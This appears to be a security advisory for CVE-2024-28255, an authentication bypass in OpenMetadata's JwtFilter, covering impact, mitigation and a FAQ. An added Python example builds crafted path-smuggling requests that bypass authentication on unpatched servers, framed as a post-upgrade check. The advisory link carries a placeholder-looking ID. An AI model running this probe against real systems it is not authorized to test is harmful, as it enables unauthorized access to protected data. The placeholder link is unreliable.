Platform
java
Component
openmetadata
Fixed in
1.2.4
CVE-2024-28255 is a critical authentication bypass in OpenMetadata versions up to and including 1.2.3. The flaw sits in the JwtFilter component, which authenticates API requests by validating the caller's JWT: a crafted request path can make the filter skip that validation, so an unauthenticated caller reaches protected API endpoints. The fix ships in version 1.2.4.
The impact of CVE-2024-28255 is severe. JwtFilter exempts a small set of endpoints that must work without a token (login, signup and similar) from JWT validation. Because that exemption was decided by matching the request path too loosely, an attacker could craft a path to a protected resource that the filter treated as exempt, and the request was then handled with no authentication at all. Anyone able to reach the API could therefore read sensitive metadata, change configuration and perform any other action the API exposes. Successful exploitation can mean data exposure, tampering with the metadata catalogue and disruption of data-governance processes. The root cause is the one behind many allow-list bypasses: an authentication exemption decided by loose string matching rather than an exact comparison of the routed path, which is why such exemptions should be exact and kept minimal.
CVE-2024-28255 was publicly disclosed on March 15, 2024. Its EPSS score of 93.92% puts it in the 100th percentile, meaning exploitation attempts are considered highly likely. No active exploitation campaign had been publicly reported at the time of writing, and the vulnerability is not listed in the CISA KEV catalog, but the bypass is simple to trigger once understood and public proof-of-concept code should be expected; treat it as a high-priority fix.
Exploit Status
EPSS: 93.92% (100th percentile)
The only real fix for CVE-2024-28255 is to upgrade OpenMetadata to version 1.2.4 or later, which corrects the exemption check in JwtFilter. If upgrading cannot happen immediately, reduce exposure in the meantime: restrict network access to the OpenMetadata API to trusted sources (firewall rules, a reverse proxy with an allow-list, or keeping the service off the public internet), review the platform's configuration so that a bypass reaches as little as possible, and check access logs for unauthenticated requests to protected endpoints. Note that an operator cannot add "stricter input validation" to the filter without changing its code, so that is not a usable workaround. After upgrading, confirm the fix by sending unauthenticated requests to a protected endpoint using the kind of manipulated path the bypass relies on; the server must reject them with 401 or 403.
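To make the mechanism and the post-upgrade check concrete, here is an added example (not OpenMetadata's code and not from the original page). It models the bug class behind the bypass, an authentication filter that exempts a few unauthenticated endpoints and, before the fix, decided the exemption by substring matching on the request path, next to the hardened exact-match check, and it provides a probe that sends unauthenticated requests with an exempt endpoint string smuggled into the path of a protected endpoint. The exemption list, the protected path, the token value and the local stand-in server are all constructed for the example so it runs offline; whether a real JAX-RS service routes a path carrying a matrix parameter to the protected resource is this example's assumption, and `probe()` can be pointed at a real instance after upgrading.

```python
"""
Added example for CVE-2024-28255 (not OpenMetadata's code). Models the bug
class behind the bypass and provides a post-upgrade probe. Assumptions: the
filter exempts a short list of unauthenticated endpoints and, before the fix,
decided the exemption by substring matching on the request path; the fixed
check compares the whole path exactly. Endpoint list, protected path, token
value and the stand-in server are constructed for the example.
"""
import http.server
import threading
import urllib.error
import urllib.request

# Assumed exemption list: endpoints that legitimately need no JWT.
EXEMPT_ENDPOINTS = ("v1/users/login", "v1/users/signup", "v1/system/version")
PROTECTED_PATH = "/api/v1/tables"      # assumed protected endpoint
ACCEPTED_TOKEN = "Bearer good-token"   # constructed stand-in for a valid JWT


def routed_path(raw_target: str) -> str:
    """Path as the filter sees it: no query string, no leading '/', no 'api/'
    prefix. Matrix parameters (';k=v') stay in the string, as in JAX-RS."""
    path = raw_target.split("?", 1)[0].lstrip("/")
    return path[len("api/"):] if path.startswith("api/") else path


def is_exempt_vulnerable(raw_target: str) -> bool:
    """Pre-fix behaviour: any path *containing* an exempt string skips JWT
    validation, so a protected path with an exempt string smuggled in passes."""
    path = routed_path(raw_target)
    return any(endpoint in path for endpoint in EXEMPT_ENDPOINTS)


def is_exempt_fixed(raw_target: str) -> bool:
    """Hardened behaviour: the whole path must equal an exempt endpoint
    (case-insensitively); anything else needs a valid token."""
    path = routed_path(raw_target).lower()
    return any(path == endpoint for endpoint in EXEMPT_ENDPOINTS)


class _StandInServer(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for an API: applies one of the two checks above,
    then falls back to a token check. Not real server code."""
    exempt = staticmethod(is_exempt_vulnerable)

    def do_GET(self):
        authed = self.exempt(self.path) or \
            self.headers.get("Authorization") == ACCEPTED_TOKEN
        self.send_response(200 if authed else 401)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


def start_stand_in(fixed: bool):
    """Run the stand-in on a random localhost port; returns (server, base_url)."""
    check = is_exempt_fixed if fixed else is_exempt_vulnerable
    handler = type("Handler", (_StandInServer,), {"exempt": staticmethod(check)})
    server = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def _status(url: str) -> int:
    """HTTP status of an unauthenticated GET (error statuses returned, not raised)."""
    try:
        with urllib.request.urlopen(urllib.request.Request(url), timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe(base_url: str, protected: str = PROTECTED_PATH) -> dict:
    """Hit a protected endpoint with no token: once plainly, then once per
    exempt string appended as a matrix parameter (';v1/users/login'). In
    JAX-RS, matrix parameters are ignored for routing but remain in the path
    string a filter inspects (this example's assumption). A patched server
    answers 401/403 to every one of these requests."""
    results = {"plain": _status(base_url + protected)}
    for endpoint in EXEMPT_ENDPOINTS:
        results[endpoint] = _status(f"{base_url}{protected};{endpoint}")
    return results


def still_vulnerable(results: dict) -> bool:
    """True if any crafted, unauthenticated request was served with a 2xx."""
    return any(200 <= code < 300 for key, code in results.items() if key != "plain")


if __name__ == "__main__":
    for fixed in (False, True):
        server, url = start_stand_in(fixed)
        outcome = probe(url)
        server.shutdown()
        print("fixed" if fixed else "vulnerable", outcome, "->",
              "STILL VULNERABLE" if still_vulnerable(outcome) else "enforced")
```

Against the vulnerable stand-in the plain request is refused but every smuggled-path request is served, which is the signature of the bypass; against the fixed stand-in all of them get 401. To verify a real upgrade, call `probe("https://your-openmetadata-host")` with a protected path you know requires a token and expect `still_vulnerable()` to be False.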
Upgrade OpenMetadata to version 1.2.4 or higher; this release addresses the authentication bypass. There is no configuration-level workaround: restricting network access only limits exposure, so upgrading is the only recommended solution.
CVE-2024-28255 is a critical vulnerability in OpenMetadata versions up to 1.2.3 that lets an unauthenticated attacker bypass JWT authentication in the JwtFilter by manipulating the request path, gaining unauthorized access to protected API endpoints.
Yes, if you are running OpenMetadata version 1.2.3 or earlier, you are affected by this vulnerability and should upgrade immediately.
Upgrade OpenMetadata to version 1.2.4 or later to remediate the vulnerability. Until then, restrict network access to the API to trusted sources; no configuration change removes the flaw.
No active exploitation campaign had been publicly reported at the time of writing, but the EPSS score of 93.92% and the simplicity of the bypass make it a high-priority fix.
Refer to the OpenMetadata security advisory for detailed information and updates: [https://github.com/open-metadata/open-metadata/security/advisories/GHSA-9999-9999-9999](https://github.com/open-metadata/open-metadata/security/advisories/GHSA-9999-9999-9999)